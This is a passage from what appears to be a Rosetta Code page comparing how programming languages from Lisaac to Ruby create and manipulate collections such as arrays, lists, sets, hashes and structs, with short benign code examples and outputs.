Lisaac[edit] vector[edit] + vector : ARRAY[INTEGER]; vector := ARRAY[INTEGER].create_with_capacity 32 lower 0; vector.add_last 1; vector.add_last 2; hashed set[edit] + set : HASHED_SET[INTEGER]; set := HASHED_SET[INTEGER].create; set.add 1; set.add 2; linked list[edit] + list : LINKED_LIST[INTEGER]; list := LINKED_LIST[INTEGER].create; list.add_last 1; list.add_last 2; hashed dictionary[edit] + dict : HASHED_DICTIONARY[INTEGER/*value*/, STRING_CONSTANT/*key*/]; dict := HASHED_DICTIONARY[INTEGER, STRING_CONSTANT].create; dict.put 1 to "one"; dict.put 2 to "two"; Logo[edit] Logo has a list-like protocol (first, butfirst, etc.) which works on three different data types: - members of a list: [one two three] - items in an array: {one two three} - characters in a word: "123 Lua[edit] Lua has only one type of collection, the table. But Lua's table has features of both traditional arrays and hash maps (dictionaries). You can even mix both within one table. Note that the numeric indices of Lua's table start at 1, not at 0 as with most other languages. collection = {0, '1'} print(collection[1]) -- prints 0 collection = {["foo"] = 0, ["bar"] = '1'} -- a collection of key/value pairs print(collection["foo"]) -- prints 0 print(collection.foo) -- syntactic sugar, also prints 0 collection = {0, '1', ["foo"] = 0, ["bar"] = '1'} It is idiomatic in Lua to represent a Set data structure with a table of keys to the true value.
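A minimal sketch of that set idiom (the member names are illustrative):

```lua
local set = {}                  -- the set: a table mapping members to true
set["apple"] = true             -- add a member
set["pear"]  = true
set["apple"] = true             -- adding an existing member is harmless
if set["apple"] then            -- membership test is just indexing
  print("apple is in the set")
end
print(set["plum"])              -- absent members yield nil (falsy)
set["pear"] = nil               -- remove a member
for member in pairs(set) do     -- iterate the members (order unspecified)
  print(member)
end
```

Membership tests, insertions and removals are all single table operations, which is why this idiom is preferred over searching through a sequence.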
Maple[edit] Defining lists: L1 := [3, 4, 5, 6]; L1 := [3, 4, 5, 6] L2 := [7, 8, 9]; L2 := [7, 8, 9] Concatenating two lists: [op(L1), op(L2)] [3, 4, 5, 6, 7, 8, 9] Defining an Array: A1 := Array([3, 4, 5, 6]); A1 := [3, 4, 5, 6] Appending to an Array: ArrayTools:-Append(A1, 7); A1 := [3, 4, 5, 6, 7] Mathematica / Wolfram Language[edit] Lst = {3, 4, 5, 6} ->{3, 4, 5, 6} PrependTo[ Lst, 2] ->{2, 3, 4, 5, 6} PrependTo[ Lst, 1] ->{1, 2, 3, 4, 5, 6} Lst ->{1, 2, 3, 4, 5, 6} Insert[ Lst, X, 4] ->{1, 2, 3, X, 4, 5, 6} MATLAB / Octave[edit] MATLAB cell-arrays perform this function. They are indexed like arrays, but each cell can hold a value of any data type, independently of what the other cells hold. In essence, cell-arrays are heterogeneous containers. Sample Usage: >> A = {2,'TPS Report'} %Declare cell-array and initialize A = [2] 'TPS Report' >> A{2} = struct('make','honda','year',2003) A = [2] [1x1 struct] >> A{3} = {3,'HOVA'} %Create and assign A{3} A = [2] [1x1 struct] {1x2 cell} >> A{2} %Get A{2} ans = make: 'honda' year: 2003 NetRexx[edit] NetRexx can take advantage of Java's Collection classes.
This example uses the Set interface backed by a HashSet: /* NetRexx */ options replace format comments java crossref symbols nobinary myVals = [ 'zero', 'one', 'two', 'three', 'four', 'five' ] mySet = Set mySet = HashSet() loop val over myVals mySet.add(val) end val loop val over mySet say val end val return Nim[edit] Array[edit] Length is known at compile time var a = [1,2,3,4,5,6,7,8,9] var b: array[128, int] b[9] = 10 b[0..8] = a var c: array['a'..'d', float] = [1.0, 1.1, 1.2, 1.3] c['b'] = 10000 Seq[edit] Variable length sequences var d = @[1,2,3,5,6,7,8,9] d.add(10) d.add([11,12,13,14]) d[0] = 0 var e: seq[float] = @[] e.add(15.5) var f = newSeq[string]() f.add("foo") f.add("bar") Tuple[edit] Fixed length, named var g = (13, 13, 14) g[0] = 12 var h: tuple[key: string, val: int] = ("foo", 100) # A sequence of key-val tuples: var i = {"foo": 12, "bar": 13} Set[edit] Bit vector of ordinals var j: set[char] j.incl('X') var k = {'a'..'z', '0'..'9'} j = j + k Tables[edit] Hash tables (there are also ordered hash tables and counting hash tables) import tables var l = initTable[string, int]() l["foo"] = 12 l["bar"] = 13 var m = {"foo": 12, "bar": 13}.toTable m["baz"] = 14 Sets[edit] Hash sets (also ordered hash sets) import sets var n = initSet[string]() n.incl("foo") var o = ["foo", "bar", "baz"].toSet o.incl("foobar") Queues[edit] import queues var p = initQueue[int]() p.add(12) p.add(13) Objeck[edit] vector[edit] values := IntVector->New(); values->AddBack(7); values->AddBack(3); values->AddBack(10); linked list[edit] values := IntList->New(); values->AddBack(7); values->AddBack(3); values->AddBack(10); hash[edit] values := StringHash->New(); values->Insert("seven", IntHolder->New(7)); values->Insert("three", IntHolder->New(3)); values->Insert("ten", IntHolder->New(10)); stack[edit] values := IntStack->New(); values->Push(7); values->Push(3); values->Push(10); Objective-C[edit] OpenStep (and derivatives like GNUstep and Cocoa) has several collection classes; here we
show - a set: a collection of unique elements (like a mathematical set). Possible operations on a set are not shown; - a counted set (also known as bag): each element has a counter that says how many times that element appears; - a dictionary: key-value pairs. Arrays (indexed by an integer), which are also collections, are not shown here. #import <Foundation/Foundation.h> void show_collection(id coll) { for ( id el in coll ) { if ( [coll isKindOfClass: [NSCountedSet class]] ) { NSLog(@"%@ appears %lu times", el, [coll countForObject: el]); } else if ( [coll isKindOfClass: [NSDictionary class]] ) { NSLog(@"%@ -> %@", el, coll[el]); } else { NSLog(@"%@", el); } } printf("\n"); } int main() { @autoreleasepool { // create an empty set NSMutableSet *set = [[NSMutableSet alloc] init]; // populate it [set addObject: @"one"]; [set addObject: @10]; [set addObjectsFromArray: @[@"one", @20, @10, @"two"] ]; // let's show it show_collection(set); // create an empty counted set (a bag) NSCountedSet *cset = [[NSCountedSet alloc] init]; // populate it [cset addObject: @"one"]; [cset addObject: @"one"]; [cset addObject: @"two"]; // show it show_collection(cset); // create a dictionary NSMutableDictionary *dict = [[NSMutableDictionary alloc] init]; // populate it dict[@"four"] = @4; dict[@"eight"] = @8; // show it show_collection(dict); } return EXIT_SUCCESS; } - Output: two 20 10 one two appears 1 times one appears 2 times eight -> 8 four -> 4 OCaml[edit] Lists are written like so: [1; 2; 3; 4; 5] To prepend a single element to a list, use the :: operator: 1 :: [2; 3; 4; 5] To concatenate two lists, use @: [1; 2] @ [3; 4; 5] To concatenate a whole list of lists, use List.flatten: # List.flatten [[1; 2]; [3; 4]; [5; 6; 7]] ;; - : int list = [1; 2; 3; 4; 5; 6; 7] Being a functional programming language, the list is one of the most important collection types.
And being an impure functional language, there are also imperative collection types, for example arrays: [| 1; 2; 3; 4; 5 |] The extlib also provides a type Enum.t. Oforth[edit] Collection is a class. In the lang package, subclasses are : Buffer A collection of bytes Mem A mutable collection of bytes Interval A first value, a last value and a step. Pair A collection of 2 elements (with key/value features). List A collection of n elements ListBuffer A mutable collection of n elements that can grow when necessary String A collection of n characters Symbol A collection of n characters compared by identity (if they are equal, they are the same object). StringBuffer A mutable collection of n characters that can grow when necessary There is no Array collection : an immutable array is a list (which is immutable) and a mutable array is a ListBuffer. A List (or a Pair) can be created using the following syntax : [ 1, 1.2, "abcd", [ 1, 2, 3 ] ] In order to add values to a collection, you have to use a ListBuffer (a mutable collection) : ListBuffer new dup add(10) dup add("aaa") dup add(Date now) dup add(1.3) println - Output: [10, aaa, 2015-02-02 14:02:17,047, 1.3] ooRexx[edit] ooRexx has multiple classes that are collections of other objects with different access and storage characteristics. - Arrays ooRexx arrays are sequential lists of object references. The index values are the numeric position (1-based) within the array. A given array may be sparse and arrays will be automatically expanded as needed. a = .array~new(4) -- creates an array of 4 items, with all slots empty say a~size a~items -- size is 4, but there are 0 items a[1] = "Fred" -- assigns a value to the first item a[5] = "Mike" -- assigns a value to the fifth slot, expanding the size say a~size a~items -- size is now 5, with 2 items - Lists Lists are non-sparse sequential lists of object references. Items can be inserted or deleted at any position and the positions will be adjusted accordingly.
Lists are indexed using index cookies that are assigned when an entry is added to the list and can be used to access entries or traverse through the list. l = .list~new -- lists have no inherent size index = l~insert('123') -- adds an item to this list, returning the index l~insert('Fred', .nil) -- inserts this at the beginning l~insert('Mike') -- adds this to the end l~insert('Rick', index) -- inserts this after '123' l[index] = l[index] + 1 -- the original item is now '124' do item over l -- iterate over the items, displaying them in order say item end - Output: Fred 124 Rick Mike - Queues Queues are non-sparse sequential lists of object references. The index values are by numeric position (1-based), although access to items is traditionally done by pushing or popping objects. q = .queue~of(2,4,6) -- creates a queue containing 3 items say q[1] q[3] -- displays "2 6" i = q~pull -- removes the first item q~queue(i) -- adds it to the end say q[1] q[3] -- displays "4 2" q[1] = q[1] + 1 -- updates the first item say q[1] q[3] -- displays "5 2" - Tables Tables are collections that create a one-to-one relationship between an index object and a referenced object. Although frequently used with string indexes, the index object can be of any class, with index identity determined by the "==" method. t = .table~new t['abc'] = 1 t['def'] = 2 say t['abc'] t['def'] -- displays "1 2" - Relations Relation collections create one-to-many data relationships. An addition to the collection will always create a new entry. 
t = .table~new -- a table example to demonstrate the difference t['abc'] = 1 -- sets an item at index 'abc' t['abc'] = 2 -- updates that item say t~items t['abc'] -- displays "1 2" r = .relation~new r['abc'] = 1 -- sets an item at index 'abc' r['abc'] = 2 -- adds an additional item at the same index say r~items r['abc'] -- displays "2 2" this has two items in it now do item over r~allAt('abc') -- retrieves all items at the index 'abc' say item end - Directories Directory objects are like tables, but the index values must always be string objects. d = .directory~new d['abc'] = 1 d['def'] = 2 say d['abc'] d['def'] -- displays "1 2" Directory objects also support an UNKNOWN method that map messages to directory index entries. This allows values to be set as if they were object attributes. The following example is another way of doing the same as the first example: d = .directory~new d~abc = 1 d~def = 2 say d~abc d~def -- displays "1 2" Note that the index entries created in the example are the uppercase 'ABC' and 'DEF'. - Sets Sets are unordered collections where the items added to the collection are unique values. Duplicate additions are collapsed to just a single item. Sets are useful for collecting unique occurrences of items. 
s = .set~new text = "the quick brown fox jumped over the lazy dog" do word over text~makearray(' ') s~put(word) end say "text has" text~words", but only" s~items "unique words" Oz[edit] The most important collection types are lists, records, dictionaries and arrays: declare %% Lists (immutable, recursive) Xs = [1 2 3 4] %% Add element at the front (cons) Xs0 = 0|Xs {Show {Length Xs}} %% output: 4 %% Records (immutable maps with a label) Rec = label(1:2 symbol:3) {Show Rec} %% output: label(2 symbol:3) {Show Rec.1} %% output: 2 %% create a new record with an added field Rec2 = {AdjoinAt Rec 2 value} {Show Rec2} %% output: label(2 value symbol:3) %% Dictionaries (mutable maps) Dict = {Dictionary.new} Dict.1 := 1 Dict.symbol := 3 {Show Dict.1} %% output: 1 %% Arrays (mutable with integer keys) Arr = {Array.new 1 10 initValue} Arr.1 := 3 {Show Arr.1} %% output: 3 There are also tuples (records with consecutive integer keys starting with 1), weak dictionaries, queues and stacks. PARI/GP[edit] Pari has vectors, column vectors, matrices, sets, lists, small vectors, and maps. v = vector(0); v = []; cv = vectorv(0); cv = []~; m = matrix(1,1); s = Set(v); l = List(v); vs = vectorsmall(0); M = Map() Adding members: listput(l, "hello world") v=concat(v, [1,2,3]); v=concat(v, 4); mapput(M, "key", "value"); Pascal[edit] Different implementations of Pascal have various containers. 
Array[edit] var MyArray: array[1..5] of real; begin MyArray[1] := 4.35; end; Dynamic Array[edit] var MyArray: array of integer; begin setlength (MyArray, 10); MyArray[4] := 99; end; Record[edit] var MyRecord: record x, y, z: real; presence: boolean; end; begin MyRecord.x := 0.3; MyRecord.y := 3.2; MyRecord.z := -4.0; MyRecord.presence := true; end; Set[edit] type days = (Mon, Tue, Wed, Thu, Fri, Sat, Sun); var workDays, week, weekendDays: set of days; begin workdays := [Mon, Tue, Wed, Thu, Fri]; week := workdays + [Sat, Sun]; weekendDays := week - workdays; end; String[edit] var MyString: String; begin MyString:= 'Some Text'; end; List[edit] program ListDemo; uses classes; var MyList: TList; a, b, c: integer; i: integer; begin a := 1; b := 2; c := 3; MyList := TList.Create; MyList.Add(@a); MyList.Add(@c); MyList.Insert(1, @b); for i := MyList.IndexOf(MyList.First) to MyList.IndexOf(MyList.Last) do writeln (integer(MyList.Items[i]^)); MyList.Destroy; end. - Output: % ./ListDemo 1 2 3 Collection[edit] Example from the documentation of the FreePascal runtime library. Program ex34; { Program to demonstrate the TCollection.AtInsert method } Uses Objects, MyObject; { For TMyObject definition and registration } Var C : PCollection; M : PMyObject; I : Longint; Procedure PrintField (Dummy : Pointer; P : PMyObject); begin Writeln ('Field : ',P^.GetField); end; begin Randomize; C:=New(PCollection, Init(120, 10)); Writeln ('Inserting 100 records at random places.'); For I:=1 to 100 do begin M:=New(PMyObject, Init); M^.SetField(I-1); If I=1 then C^.Insert(M) else With C^ do AtInsert(Random(Count), M); end; Writeln ('Values : '); C^.Foreach(@PrintField); Dispose(C, Done); end. Perl[edit] Perl has arrays and hashes. use strict; my @c = (); # create an empty "array" collection # fill it push @c, 10, 11, 12; push @c, 65; # print it print join(" ",@c) .
"\n"; # create an empty hash my %h = (); # add some pair $h{'one'} = 1; $h{'two'} = 2; # print it foreach my $i ( keys %h ) { print $i . " -> " . $h{$i} . "\n"; } Perl 6[edit] Perl 6 has both mutable and immutable containers of various sorts. Here are some of the most common ones: Mutable[edit] # Array my @array = 1,2,3; @array.push: 4,5,6; # Hash my %hash = 'a' => 1, 'b' => 2; %hash<c d> = 3,4; %hash.push: 'e' => 5, 'f' => 6; # SetHash my $s = SetHash.new: <a b c>; $s ∪= <d e f>; # BagHash my $b = BagHash.new: <b a k l a v a>; $b ⊎= <a b c>; Immutable[edit] # List my @list := 1,2,3; my @newlist := |@list, 4,5,6; # |@list will slip @list into the surrounding list instead of creating a list of lists # Set my $set = set <a b c>; my $newset = $set ∪ <d e f>; # Bag my $bag = bag <b a k l a v a>; my $newbag = $bag ⊎ <b e e f>; Pair list (cons list)[edit] my $tail = d => e => f => Nil; my $new = a => b => c => $tail; P6opaque object (immutable in structure)[edit] class Something { has $.foo; has $.bar }; my $obj = Something.new: foo => 1, bar => 2; my $newobj = $obj but role { has $.baz = 3 } # anonymous mixin Phix[edit] Collections can simply be stored as sequences sequence collection = {} collection = append(collection,"one") collection = prepend(collection,2) ? 
collection -- {2,"one"} If you want uniqueness, you could simply use a dictionary with values of 0: setd("one",0) setd(2,0) function visitor(object key, object /*data*/, object /*user_data*/) ?key return 1 end function traverse_dict(routine_id("visitor")) -- shows 2, "one" PHP[edit] PHP has associative arrays as collection <?php $a = array(); # add elements "at the end" array_push($a, 55, 10, 20); print_r($a); # using an explicit key $a['one'] = 1; $a['two'] = 2; print_r($a); ?> - Output: Array ( [0] => 55 [1] => 10 [2] => 20 ) Array ( [0] => 55 [1] => 10 [2] => 20 [one] => 1 [two] => 2 ) PicoLisp[edit] The direct way in PicoLisp is a linear list (other possibilities could involve index trees or property lists). : (setq Lst (3 4 5 6)) -> (3 4 5 6) : (push 'Lst 2) -> 2 : (push 'Lst 1) -> 1 : Lst -> (1 2 3 4 5 6) : (insert 4 Lst 'X) -> (1 2 3 X 4 5 6) PL/I[edit] declare countries character (20) varying controlled; allocate countries initial ('Britain'); allocate countries initial ('America'); allocate countries initial ('Argentina'); PowerShell[edit] The most common collection types in PowerShell are arrays and hash tables. Array[edit] The array index is zero based. 
# Create an Array by separating the elements with commas: $array = "one", 2, "three", 4 # Using explicit syntax: $array = @("one", 2, "three", 4) # Send the values back into individual variables: $var1, $var2, $var3, $var4 = $array # An array of several integer ([int]) values: $array = 0, 1, 2, 3, 4, 5, 6, 7 # Using the range operator (..): $array = 0..7 # Strongly typed: [int[]] $stronglyTypedArray = 1, 2, 4, 8, 16, 32, 64, 128 # An empty array: $array = @() # An array with a single element: $array = @("one") # I suppose this would be a jagged array: $jaggedArray = @((11, 12, 13), (21, 22, 23), (31, 32, 33)) $jaggedArray | Format-Wide {$_} -Column 3 -Force $jaggedArray[1][1] # returns 22 # A Multi-dimensional array: $multiArray = New-Object -TypeName "System.Object[,]" -ArgumentList 6,6 for ($i = 0; $i -lt 6; $i++) { for ($j = 0; $j -lt 6; $j++) { $multiArray[$i,$j] = ($i + 1) * 10 + ($j + 1) } } $multiArray | Format-Wide {$_} -Column 6 -Force $multiArray[2,2] # returns 33 Hash Table[edit] Hash tables come in two varieties: normal and ordered, where of course, the order of entry is retained. # An empty Hash Table: $hash = @{} # A Hash table populated with some values: $nfcCentralDivision = @{ Packers = "Green Bay" Bears = "Chicago" Lions = "Detroit" } # Add items to a Hash Table: $nfcCentralDivision.Add("Vikings","Minnesota") $nfcCentralDivision.Add("Buccaneers","Tampa Bay") # Remove an item from a Hash Table: $nfcCentralDivision.Remove("Buccaneers") # Searching for items $nfcCentralDivision.ContainsKey("Packers") $nfcCentralDivision.ContainsValue("Green Bay") # A bad value... 
$hash1 = @{ One = 1 Two = 3 } # Edit an item in a Hash Table: $hash1.Set_Item("Two",2) # Combine Hash Tables: $hash2 = @{ Three = 3 Four = 4 } $hash1 + $hash2 # Using the ([ordered]) accelerator the items in the Hash Table retain the order in which they were input: $nfcCentralDivision = [ordered]@{ Bears = "Chicago" Lions = "Detroit" Packers = "Green Bay" Vikings = "Minnesota" } Other Collection Types[edit] PowerShell is a .NET language so all of the collection types in .NET are available to PowerShell. The most commonly used would probably be [System.Collections.ArrayList]. $list = New-Object -TypeName System.Collections.ArrayList -ArgumentList 1,2,3 # or... $list = [System.Collections.ArrayList]@(1,2,3) $list.Add(4) | Out-Null $list.RemoveAt(2) PureBasic[edit] Arrays[edit] Creating an Array of 10 strings (could be any type). PureBasic starts the index with element 0. Dim Text.s(9) Text(3)="Hello" Text(7)="World!" Linked Lists[edit] Create a Linked List for strings (could be any type), then add two elements. NewList Cars.s() AddElement(Cars()): Cars()="Volvo" AddElement(Cars()): Cars()="BMV" Hash table[edit] Create a Map, e.g. a hash table that could be any type. The size of the dictionary can be defined as needed, otherwise a default value is used. NewMap Capitals.s() Capitals("USA") = "Washington" Capitals("Sweden")= "Stockholm" Python[edit] Python supports lists, tuples, dictionaries and now sets as built-in collection types. See for further details. collection = [0, '1'] # Lists are mutable (editable) and can be sorted in place x = collection[0] # accessing an item (which happens to be a numeric 0 (zero) collection.append(2) # adding something to the end of the list collection.insert(0, '-1') # inserting a value into the beginning y = collection[0] # now returns a string of "-1" collection.extend([2,'3']) # same as [collection.append(i) for i in [2,'3']] ... 
but faster collection += [2,'3'] # same as previous line collection[2:6] # a "slice" (collection of the list elements from the third up to but not including the sixth) len(collection) # get the length of (number of elements in) the collection collection = (0, 1) # Tuples are immutable (not editable) collection[:] # ... slices work on these too; and this is equivalent to collection[0:len(collection)] collection[-4:-1] # negative slices count from the end of the string collection[::2] # slices can also specify a stride --- this returns all even elements of the collection collection="some string" # strings are treated as sequences of characters x = collection[::-1] # slice with negative step returns reversed sequence (string in this case). collection[::2] == "some string"[::2] # True, literal objects don't need to be bound to name/variable to access slices or object methods collection.__getitem__(slice(0,len(collection),2)) # same as previous expressions. collection = {0: "zero", 1: "one"} # Dictionaries (Hash) collection['zero'] = 2 # Dictionary members accessed using same syntax as list/array indexes. collection = set([0, '1']) # sets (Hash) In addition Python classes support a number of methods allowing them to implement indexing, slicing, and attribute management features as collections. Thus many modules in the Python standard libraries allow one to treat files contents, databases, and other data using the same syntax as the native collection types. Some Python modules (such as Numeric and NumPy) provide low-level implementations of additional collections (such as efficient n-dimensional arrays). R[edit] R has several types that can be considered collections. 
Vectors[edit] Numeric (floating point) numeric(5) 1:10 c(1, 3, 6, 10, 7 + 8, sqrt(441)) [1] 0 0 0 0 0 [1] 1 2 3 4 5 6 7 8 9 10 [1] 1 3 6 10 15 21 Integer integer(5) c(1L, -2L, 99L); [1] 0 0 0 0 0 [1] 1 -2 99 Logical logical(5) c(TRUE, FALSE) [1] FALSE FALSE FALSE FALSE FALSE [1] TRUE FALSE Character character(5) c("abc", "defg", "") [1] "" "" "" "" "" [1] "abc" "defg" "" Arrays and Matrices[edit] These are essentially vectors with a dimension attribute. Matrices are just arrays with two dimensions (and a different class). matrix(1:12, nrow=3) array(1:24, dim=c(2,3,4)) #output not shown [,1] [,2] [,3] [,4] [1,] 1 4 7 10 [2,] 2 5 8 11 [3,] 3 6 9 12 Lists[edit] Lists are collections of other variables (that can include other lists). list(a=123, b="abc", TRUE, 1:5, c=list(d=runif(5), e=5+6)) $a [1] 123 $b [1] "abc" [[3]] [1] TRUE [[4]] [1] 1 2 3 4 5 $c $c$d [1] 0.6013157 0.5011909 0.7106448 0.3882265 0.1274939 $c$e [1] 11 Data Frames[edit] Data frames are like a cross between a list and a matrix. Each row represents one "record", or a collection of variables. data.frame(name=c("Alice", "Bob", "Carol"), age=c(23, 35, 17)) name age 1 Alice 23 2 Bob 35 3 Carol 17 Racket[edit] As in other lisps, the simple kind of linked lists are the most common collection-of-values type. #lang racket ;; create a list (list 1 2 3 4) ;; create a list of size N (make-list 100 0) ;; add an element to the front of a list (non-destructively) (cons 1 (list 2 3 4)) Racket comes with about 7000 additional types that can be considered as a collection of values, but it's not clear whether this entry is supposed to be a laundry list... 
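Several of the entries above (OCaml, Racket, and Scheme below) build lists by consing a head onto an existing tail, so prepending never mutates the original list. As an illustrative aside, not tied to any one language's entry, the same cons-cell structure can be sketched in Python using nested tuples; the helper names cons and to_list are invented for this sketch, not from any library:

```python
# A cons list as nested 2-tuples: (head, tail), with None as the empty list.
# This mirrors the cons/append behaviour shown in the Lisp-family entries.

def cons(head, tail):
    """Prepend an element, like OCaml's :: or Scheme's cons."""
    return (head, tail)

def to_list(cell):
    """Flatten a cons list into a Python list for display."""
    out = []
    while cell is not None:
        head, cell = cell
        out.append(head)
    return out

empty = None
xs = cons(1, cons(2, cons(3, empty)))  # build the list 1, 2, 3
ys = cons(0, xs)                       # non-destructive prepend

print(to_list(ys))  # [0, 1, 2, 3]
print(to_list(xs))  # [1, 2, 3] -- xs is unchanged, ys shares its cells
```

Because ys shares the cells of xs rather than copying them, prepending is O(1), which is exactly why the functional-language entries favour this representation.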
Raven[edit] Numerically indexed List: [ 1 2 3 'abc' ] as a_list a_list print list (4 items) 0 => 1 1 => 2 2 => 3 3 => "abc" String key indexed Hash: { 'a' 1 'b' 2 } as a_hash a_hash print hash (2 items) a => 1 b => 2 Set items: 17 a_list 1 set # set second item 42 a_hash 'b' set # set item with key 'b' 42 a_hash:b # shorthand Get items: a_list 1 get # get second item a_hash 'b' get # get item with key 'b' a_hash.b # shorthand Other stuff: 42 a_list push # append an item a_list pop # remove last item 42 a_list shove # prepend an item a_list shift # remove first item 42 a_list 1 insert # insert item second, shuffling others down a_list 1 remove # retrieve second item, shuffling others up REXX[edit] There are several ways to store collections in REXX: - stemmed arrays - lists or vectors - sparse stemmed arrays stemmed arrays[edit] To store (say) a collection of numbers (or anything, for that matter) into a stemmed array: pr.=0 /*define a default for all elements for the stemmed array.*/ pr.1 =2 /*note that this array starts at 1 (one). */ pr.2 =3 pr.3 =5 pr.4 =7 pr.5 =11 pr.6 =13 pr.7 =17 pr.8 =19 pr.9 =23 pr.10=29 pr.11=31 pr.12=37 pr.13=41 pr.14=43 y.=0 /*define a default for all years. */ y.1985 = 6020 y.1986 = 7791 y.1987 = 8244 y.1988 = 10075 x = y.2000 /*X will have a value of zero (0). */ fib.0 = 0 /*arrays may start with zero (0). */ fib.1 = 1 fib.2 = 1 fib.3 = 2 fib.4 = 3 fib.5 = 5 fib.6 = 8 fib.7 =13 do n=-5 to 5 /*define an array from -5 ──► 5 */ sawtooth.n=n end /*n*/ /*eleven elements will be defined. */ Most often, programmers will assign the zeroth entry to the number of elements in the stemmed array: pr.0=14 /*number of entries in the stemmed array.*/ Programmatically, a simple test could be performed to detect the end of the array (if there aren't any null values): do j=1 while pr.j\==0 say 'prime' j 'is' pr.j end /*j*/ /*at this point, J=15.
*/ j=j-1 /*J now has the count of primes stored.*/ lists or vectors[edit] To store (say) a collection of numbers (or anything, for that matter) into a list: primeList='2 3 5 7 11 13 17 19 23 29 31 37 41 43' /* or ... */ primeList= 2 3 5 7 11 13 17 19 23 29 31 37 41 43 /*in this case, the quotes (') can be dropped. */ primes=words(primeList) do j=1 for primes /*can also be coded: do j=1 to primes */ say 'prime' j 'is' word(primeList,j) end /*j*/ sparse stemmed arrays[edit] To store (say) a collection of numbers (or anything, for that matter) into a sparse stemmed array: pr.=0 /*define a default for all elements for the stemmed array.*/ pr.2 =1 pr.3 =1 pr.5 =1 pr.7 =1 pr.11=1 pr.13=1 pr.17=1 pr.19=1 pr.23=1 pr.29=1 pr.31=1 pr.37=1 pr.41=1 pr.43=1 /*─────────────────────────────────────────────────────────────────────*/ primes=0 do j=1 for 10000 /*this method isn't very efficient*/ if pr.j==0 then iterate primes = primes+1 end /*j*/ say '# of primes in list:' primes /*─────────────────────────────────────────────────────────────────────*/ #primes=0 do j=1 for 10000 /*this method isn't very efficient*/ if pr.j\==0 then #primes = #primes+1 end /*j*/ say '# of primes in list:' #primes /*─────────────────────────────────────────────────────────────────────*/ Ps=0 /*yet another inefficient method. */ do k=1 for 10000 /*this method isn't very efficient*/ Ps = Ps + (pr.k\==0) /*more obtuse, if ya like that. */ if pr.k\==0 then say 'prime' Ps "is:" k /*echo only the primes in the list*/ end /*k*/ say 'number of primes found in the list is' Ps Ring[edit] text = list(2) text[1] = "Hello " text[2] = "world!" see text[1] + text[2] + nl Output: Hello world! Ruby[edit] Array[edit] Arrays are ordered, integer-indexed collections of any object.
# creating an empty array and adding values a = [] #=> [] a[0] = 1 #=> [1] a[3] = "abc" #=> [1, nil, nil, "abc"] a << 3.14 #=> [1, nil, nil, "abc", 3.14] # creating an array with the constructor a = Array.new #=> [] a = Array.new(3) #=> [nil, nil, nil] a = Array.new(3, 0) #=> [0, 0, 0] a = Array.new(3){|i| i*2} #=> [0, 2, 4] Hash[edit] A Hash is a dictionary-like collection of unique keys and their values. Also called associative arrays, they are similar to Arrays, but where an Array uses integers as its index, a Hash allows you to use any object type. # creating an empty hash h = {} #=> {} h["a"] = 1 #=> {"a"=>1} h["test"] = 2.4 #=> {"a"=>1, "test"=>2.4} h[3] = "Hello" #=> {"a"=>1, "test"=>2.4, 3=>"Hello"} h = {a:1, test:2.4, World!:"Hello"} #=> {:a=>1, :test=>2.4, :World!=>"Hello"} # creating a hash with the constructor h = Hash.new #=> {} (default value : nil) p h[1] #=> nil h = Hash.new(0) #=> {} (default value : 0) p h[1] #=> 0 p h #=> {} h = Hash.new{|hash, key| key.to_s} #=> {} p h[123] #=> "123" p h #=> {} h = Hash.new{|hash, key| hash[key] = "foo#{key}"} #=> {} p h[1] #=> "foo1" p h #=> {1=>"foo1"} Struct[edit] A Struct is a convenient way to bundle a number of attributes together, using accessor methods, without having to write an explicit class. # creating a struct Person = Struct.new(:name, :age, :sex) a = Person.new("Peter", 15, :Man) p a[0] #=> "Peter" p a[:age] #=> 15 p a.sex #=> :Man p a.to_a #=> ["Peter", 15, :Man] p a.to_h #=> {:name=>"Peter", :age=>15, :sex=>:Man} b = Person.new p b #=> #<struct Person name=nil, age=nil, sex=nil> b.name = "Margaret" b["age"] = 18 b[-1] = :Woman p b.values #=> ["Margaret", 18, :Woman] p b.members #=> [:name, :age, :sex] p b.size #=> 3 c = Person["Daniel", 22, :Man] p c.to_h #=> {:name=>"Daniel", :age=>22, :sex=>:Man} Set[edit] Set implements a collection of unordered values with no duplicates. This is a hybrid of Array's intuitive inter-operation facilities and Hash's fast lookup. 
require 'set' # different ways of creating a set p s1 = Set[1, 2, 3, 4] #=> #<Set: {1, 2, 3, 4}> p s2 = [8, 6, 4, 2].to_set #=> #<Set: {8, 6, 4, 2}> p s3 = Set.new(1..4) {|x| x*2} #=> #<Set: {2, 4, 6, 8}> # Union p s1 | s2 #=> #<Set: {1, 2, 3, 4, 8, 6}> # Intersection p s1 & s2 #=> #<Set: {4, 2}> # Difference p s1 - s2 #=> #<Set: {1, 3}> p s1 ^ s2 #=> #<Set: {8, 6, 1, 3}> p s2 == s3 #=> true p s1.add(5) #=> #<Set: {1, 2, 3, 4, 5}> p s1 << 0 #=> #<Set: {1, 2, 3, 4, 5, 0}> p s1.delete(3) #=> #<Set: {1, 2, 4, 5, 0}> Matrix and Vector[edit] The Matrix and Vector class represents a mathematical matrix and vector. require 'matrix' # creating a matrix p m0 = Matrix.zero(3) #=> Matrix[[0, 0, 0], [0, 0, 0], [0, 0, 0]] p m1 = Matrix.identity(3) #=> Matrix[[1, 0, 0], [0, 1, 0], [0, 0, 1]] p m2 = Matrix[[11, 12], [21, 22]] #=> Matrix[[11, 12], [21, 22]] p m3 = Matrix.build(3) {|row, col| row - col} #=> Matrix[[0, -1, -2], [1, 0, -1], [2, 1, 0]] p m2[0,0] #=> 11 p m1 * 5 #=> Matrix[[5, 0, 0], [0, 5, 0], [0, 0, 5]] p m1 + m3 #=> Matrix[[1, -1, -2], [1, 1, -1], [2, 1, 1]] p m1 * m3 #=> Matrix[[0, -1, -2], [1, 0, -1], [2, 1, 0]] # creating a Vector p v1 = Vector[1,3,5] #=> Vector[1, 3, 5] p v2 = Vector[0,1,2] #=> Vector[0, 1, 2] p v1[1] #=> 3 p v1 * 2 #=> Vector[2, 6, 10] p v1 + v2 #=> Vector[1, 4, 7] p m1 * v1 #=> Vector[1, 3, 5] p m3 * v1 #=> Vector[-13, -4, 5] OpenStruct[edit] An OpenStruct is a data structure, similar to a Hash, that allows the definition of arbitrary attributes with their accompanying values. 
